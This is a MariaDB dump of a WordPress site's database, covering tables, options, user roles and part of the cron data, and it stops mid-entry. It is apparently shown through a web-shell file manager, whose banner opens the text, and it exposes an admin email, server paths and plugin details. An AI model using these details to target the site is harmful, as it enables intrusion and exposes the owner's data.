HEX
Server: nginx/1.24.0
System: Linux webserver 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: wpuser (1002)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: //proc/thread-self/root/mnt/vfs/webserver/wp_gsudice_db_backup.sql
/*!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.6.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: wp_gsudice_db
-- ------------------------------------------------------
-- Server version	10.6.18-MariaDB-0ubuntu0.22.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_entry`
--

DROP TABLE IF EXISTS `wp_frmt_form_entry`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_entry` (
  `entry_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_type` varchar(191) NOT NULL,
  `form_id` bigint(20) unsigned NOT NULL,
  `is_spam` tinyint(1) NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `draft_id` varchar(12) DEFAULT NULL,
  PRIMARY KEY (`entry_id`),
  KEY `entry_is_spam` (`is_spam`),
  KEY `entry_type` (`entry_type`),
  KEY `entry_form_id` (`form_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_entry`
--

LOCK TABLES `wp_frmt_form_entry` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_entry` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_entry_meta`
--

DROP TABLE IF EXISTS `wp_frmt_form_entry_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_entry_meta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(191) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`),
  KEY `meta_entry_id` (`entry_id`),
  KEY `meta_key_object` (`entry_id`,`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_entry_meta`
--

LOCK TABLES `wp_frmt_form_entry_meta` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_reports`
--

DROP TABLE IF EXISTS `wp_frmt_form_reports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_reports` (
  `report_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `report_value` longtext NOT NULL,
  `status` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`report_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_reports`
--

LOCK TABLES `wp_frmt_form_reports` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_reports` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_reports` VALUES (1,'a:5:{s:7:\"exclude\";a:1:{i:0;i:1;}s:8:\"settings\";a:3:{s:5:\"label\";s:12:\"Form reports\";s:6:\"module\";s:5:\"forms\";s:10:\"forms_type\";s:3:\"all\";}s:8:\"schedule\";a:3:{s:9:\"frequency\";s:7:\"monthly\";s:8:\"monthDay\";s:1:\"4\";s:9:\"monthTime\";s:8:\"04:00 AM\";}s:13:\"report_status\";s:8:\"inactive\";s:10:\"recipients\";a:1:{i:0;a:5:{s:2:\"id\";i:1;s:4:\"name\";s:4:\"dice\";s:5:\"email\";s:13:\"dice@pobox.pw\";s:4:\"role\";s:13:\"Administrator\";s:6:\"avatar\";s:81:\"https://secure.gravatar.com/avatar/abd5c146aeb4fd0984e2e03788f82dd0?s=96&d=mm&r=g\";}}}','inactive','2023-09-29 10:05:13','2023-09-29 10:05:13');
/*!40000 ALTER TABLE `wp_frmt_form_reports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_views`
--

DROP TABLE IF EXISTS `wp_frmt_form_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_frmt_form_views` (
  `view_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned NOT NULL,
  `page_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(191) DEFAULT NULL,
  `count` mediumint(8) unsigned NOT NULL DEFAULT 1,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`view_id`),
  KEY `view_form_id` (`form_id`),
  KEY `view_ip` (`ip`),
  KEY `view_form_object` (`form_id`,`view_id`),
  KEY `view_form_object_ip` (`form_id`,`view_id`,`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_views`
--

LOCK TABLES `wp_frmt_form_views` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_views` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=312785 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://gsudice.dataconn.net','yes'),(2,'home','https://gsudice.dataconn.net','yes'),(3,'blogname','Disaster Informatics &amp; Computational Epidemiology','yes'),(4,'blogdescription','','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','dice@pobox.pw','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','','yes'),(29,'rewrite_rules','','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:3:{i:0;s:45:\"colibri-page-builder/colibri-page-builder.php\";i:1;s:31:\"custom-css-js/custom-css-js.php\";i:2;s:25:\"forminator/forminator.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:3:{i:0;s:74:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/index.php\";i:2;s:74:\"/home/websites/gsudice.dataconn.net/wp-content/themes/colibri-wp/style.css\";i:3;s:0:\"\";}','no'),(40,'template','colibri-wp','yes'),(41,'stylesheet','colibri-wp','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','55853','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','0','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:0:{}','no'),(80,'timezone_string','America/New_York','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','20','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','94','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1746552105','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'wp_force_deactivated_plugins','a:0:{}','yes'),(99,'initial_db_version','51917','yes'),(100,'wp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:89:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"staff_categories_editor\";b:1;s:23:\"manage_staff_categories\";b:1;s:23:\"assign_staff_categories\";b:1;s:17:\"edit_staff_member\";b:1;s:17:\"read_staff_member\";b:1;s:18:\"read_staff_members\";b:1;s:19:\"delete_staff_member\";b:1;s:18:\"edit_staff_members\";b:1;s:25:\"edit_others_staff_members\";b:1;s:21:\"publish_staff_members\";b:1;s:26:\"read_private_staff_members\";b:1;s:20:\"delete_staff_members\";b:1;s:28:\"delete_private_staff_members\";b:1;s:30:\"delete_published_staff_members\";b:1;s:27:\"delete_others_staff_members\";b:1;s:26:\"edit_private_staff_members\";b:1;s:28:\"edit_published_staff_members\";b:1;s:17:\"manage_forminator\";b:1;s:15:\"edit_custom_css\";b:1;s:15:\"read_custom_css\";b:1;s:17:\"delete_custom_css\";b:1;s:16:\"edit_custom_csss\";b:1;s:23:\"edit_others_custom_csss\";b:1;s:19:\"publish_custom_csss\";b:1;s:18:\"delete_custom_csss\";b:1;s:28:\"delete_published_custom_csss\";b:1;s:25:\"delete_others_custom_csss\";b:1;s:26:\"edit_published_custom_csss\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:51:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:23:\"staff_categories_editor\";b:1;s:23:\"manage_staff_categories\";b:1;s:23:\"assign_staff_categories\";b:1;s:17:\"edit_staff_member\";b:1;s:17:\"read_staff_member\";b:1;s:18:\"read_staff_members\";b:1;s:19:\"delete_staff_member\";b:1;s:18:\"edit_staff_members\";b:1;s:25:\"edit_others_staff_members\";b:1;s:21:\"publish_staff_members\";b:1;s:26:\"read_private_staff_members\";b:1;s:20:\"delete_staff_members\";b:1;s:28:\"delete_private_staff_members\";b:1;s:30:\"delete_published_staff_members\";b:1;s:27:\"delete_others_staff_members\";b:1;s:26:\"edit_private_staff_members\";b:1;s:28:\"edit_published_staff_members\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:22:\"colibri_content_editor\";a:2:{s:4:\"name\";s:14:\"Content Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"edit_theme_options\";b:1;s:9:\"customize\";b:1;}}s:15:\"css_js_designer\";a:2:{s:4:\"name\";s:12:\"Web Designer\";s:12:\"capabilities\";a:10:{s:15:\"edit_custom_css\";b:1;s:15:\"read_custom_css\";b:1;s:17:\"delete_custom_css\";b:1;s:16:\"edit_custom_csss\";b:1;s:23:\"edit_others_custom_csss\";b:1;s:19:\"publish_custom_csss\";b:1;s:18:\"delete_custom_csss\";b:1;s:28:\"delete_published_custom_csss\";b:1;s:25:\"delete_others_custom_csss\";b:1;s:26:\"edit_published_custom_csss\";b:1;}}}','yes'),(101,'fresh_site','0','yes'),(102,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:60:\"<!-- wp:search {\"showLabel\":false,\"buttonUseIcon\":true} /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','yes'),(103,'sidebars_widgets','a:14:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:22:\"colibri-ecommerce-left\";a:1:{i:0;s:15:\"custom_html-112\";}s:17:\"colibri-sidebar-1\";a:4:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:15:\"custom_html-113\";}s:28:\"colibri-header-widget-area-1\";a:1:{i:0;s:15:\"custom_html-114\";}s:28:\"colibri-header-widget-area-2\";a:1:{i:0;s:15:\"custom_html-115\";}s:28:\"colibri-header-widget-area-3\";a:1:{i:0;s:15:\"custom_html-116\";}s:29:\"colibri-content-widget-area-1\";a:1:{i:0;s:15:\"custom_html-117\";}s:29:\"colibri-content-widget-area-2\";a:1:{i:0;s:15:\"custom_html-118\";}s:29:\"colibri-content-widget-area-3\";a:1:{i:0;s:15:\"custom_html-119\";}s:28:\"colibri-footer-widget-area-1\";a:1:{i:0;s:15:\"custom_html-120\";}s:28:\"colibri-footer-widget-area-2\";a:1:{i:0;s:15:\"custom_html-121\";}s:28:\"colibri-footer-widget-area-3\";a:1:{i:0;s:15:\"custom_html-122\";}s:28:\"colibri-footer-widget-area-4\";a:1:{i:0;s:15:\"custom_html-123\";}s:13:\"array_version\";i:3;}','yes'),(104,'cron','a:12:{i:1732932599;a:1:{s:25:\"forminator_process_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:60;}}}i:1732932612;a:1:{s:22:\"forminator_send_export\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:0:{}s:8:\"interval\";i:60;}}}i:1732932768;a:1:{s:42:\"forminator_general_data_protection_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1732934672;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1732959872;a:4:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1732971711;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1732997983;a:1:{s:30:\"schedule_forminator_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1733003072;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1733003078;a:3:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a